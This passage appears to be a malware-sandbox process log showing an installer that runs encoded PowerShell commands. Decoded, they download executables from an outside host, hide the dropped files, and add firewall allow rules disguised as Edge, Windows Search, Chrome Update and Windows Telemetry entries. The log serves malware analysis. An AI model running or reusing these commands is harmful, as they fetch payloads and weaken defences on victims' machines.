AHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcA
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2608
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:800
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssB794.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiB762.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrB792.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrB793.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAewB9AAoAZQBsAHMAZQAgAHsACgAJAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACIAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAGYAcgBlAGUAcwBvAGYAdABwAGwAYQBjAGUALgBjAG8AbQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
      4⤵
      PID:1480
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:1612
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssC271.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiC25F.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrC260.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrC261.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARQBtAGIAbQBhAGsAZQAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBtAGEAawBlAC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2892
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2220
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssCEE5.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiCED2.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrCEE3.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrCEE4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1304
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:328
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssDAAD.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiDAAA.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrDAAB.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrDAAC.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIgAgAC0ARwByAG8AdQBwACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIABFAFUATABBACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACAARQBVAEwAQQAiACAALQBHAHIAbwB1AHAAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAEUAVQBMAEEAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2580
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:608
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssE491.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiE46F.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrE470.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrE480.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIgAgAC0ARwByAG8AdQBwACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUA
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1208
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2564
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEBF6.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiEBE3.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrEBE4.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrEBE5.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFQAdQBuAGkAbgBnACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACA